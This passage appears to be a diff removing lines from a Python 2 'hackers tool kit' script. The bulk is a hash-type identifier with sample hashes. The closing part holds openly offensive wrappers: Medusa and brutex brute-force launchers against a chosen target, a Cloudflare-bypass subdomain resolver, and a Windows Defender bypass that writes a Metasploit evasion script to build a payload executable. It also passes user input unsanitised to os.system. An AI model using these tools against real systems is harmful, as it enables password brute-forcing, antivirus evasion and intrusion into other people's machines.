hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - 